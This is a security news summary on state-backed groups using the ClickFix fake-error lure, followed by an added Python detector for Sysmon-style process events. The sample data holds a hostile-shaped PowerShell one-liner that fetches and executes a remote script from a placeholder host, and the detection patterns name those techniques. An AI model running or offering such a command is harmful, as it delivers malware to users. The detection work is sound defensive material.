State-Sponsored Hackers Embrace ClickFix Social Engineering for Espionage Campaigns

Threat actors from North Korea (Kimsuky), Iran (MuddyWater), and Russia (APT28, UNK_RemoteRogue) are increasingly using the "ClickFix" tactic in espionage operations. ClickFix displays a fake error prompt on a fraudulent website and instructs the victim to "fix" it by copying a command and running it themselves; the command is a malicious PowerShell one-liner, so the victim, not an exploit, launches the malware. Between late 2024 and early 2025, these campaigns targeted think tanks, Middle Eastern organizations, and arms manufacturers. Attackers used spoofed emails and decoy documents to lead victims to the fraudulent prompts, then used the resulting manual execution to establish persistent access.
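Because the victim launches the interpreter by hand, the defender's telemetry does not show an exploit, only a process-creation event that looks like a user typing a command. The detection below is an added example written for this summary, not code from the article or from any of the named threat groups' campaigns. It scans constructed, Sysmon-style process-creation events (JSON lines) and flags an interpreter started from an interactive parent (explorer.exe, which is what the Run dialog and a pasted command run under) whose command line carries the hallmarks of a pasted one-liner: hidden window, policy bypass, remote fetch, inline evaluation. The field names, indicator patterns, threshold and sample events are all assumptions made for the example.

```python
import json
import re
from typing import Iterable

# Added example, not the article's own detection. Every pattern, field name and
# threshold here is an assumption chosen for illustration.
INTERACTIVE_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
INDICATORS = [
    (re.compile(r"(?i)-(?:w|windowstyle)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-(?:ep|executionpolicy)\s+bypass"), "execution policy bypass"),
    (re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|curl)\b"), "network fetch"),
    (re.compile(r"(?i)\biex\b|invoke-expression"), "inline evaluation"),
    (re.compile(r"(?i)https?://"), "remote URL"),
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def score_event(event: dict) -> list[str]:
    """Return the indicator labels matched by one process-creation event.
    Only interpreters launched from an interactive parent are considered."""
    if _basename(event.get("image", "")) not in INTERPRETERS:
        return []
    if _basename(event.get("parent_image", "")) not in INTERACTIVE_PARENTS:
        return []
    cmd = event.get("command_line", "")
    return [label for pattern, label in INDICATORS if pattern.search(cmd)]


def detect_clickfix(lines: Iterable[str], min_indicators: int = 2) -> list[dict]:
    """Parse JSON-lines process events; emit one alert per event that reaches
    the indicator threshold. A single indicator (one URL, one -ep bypass) is
    common in legitimate admin use, so two or more are required by default."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = score_event(event)
        if len(reasons) >= min_indicators:
            alerts.append({
                "host": event.get("host"),
                "user": event.get("user"),
                "image": _basename(event.get("image", "")),
                "reasons": reasons,
            })
    return alerts


# Constructed sample telemetry for this example (Sysmon-style field names).
SAMPLE_EVENTS = [
    {   # routine admin use: launched from a console, not the Run dialog
        "host": "ws01", "user": "CORP\\admin",
        "parent_image": "C:\\Windows\\System32\\cmd.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "command_line": "powershell.exe -ep bypass -File C:\\scripts\\inventory.ps1",
    },
    {   # user pasted a "fix" into Win+R: the ClickFix shape
        "host": "ws07", "user": "CORP\\analyst",
        "parent_image": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "command_line": "powershell -w hidden -ep bypass -c \"iex (iwr 'http://example.invalid/fix.ps1')\"",
    },
    {   # interactive but harmless
        "host": "ws07", "user": "CORP\\analyst",
        "parent_image": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "command_line": "powershell Get-ChildItem C:\\Users\\analyst\\Documents",
    },
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the constructed sample, only the second event fires: it is the only interpreter under explorer.exe whose command line combines a hidden window, a policy bypass, a remote fetch and inline evaluation. The parent-process check is what separates this from generic "suspicious PowerShell" rules; the same command line launched by a scheduled task or a management agent has a different parent and is not the ClickFix pattern.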

Expert Analysis:

ClickFix is the latest proof that technical protections alone cannot defeat social engineering. Attackers are bypassing security tools not by force but by persuasion, exploiting human reflexes instead of system flaws. When a fake prompt can open a backdoor as effectively as a zero-day exploit, the entire defense strategy must evolve beyond reactive patches to proactive user conditioning.
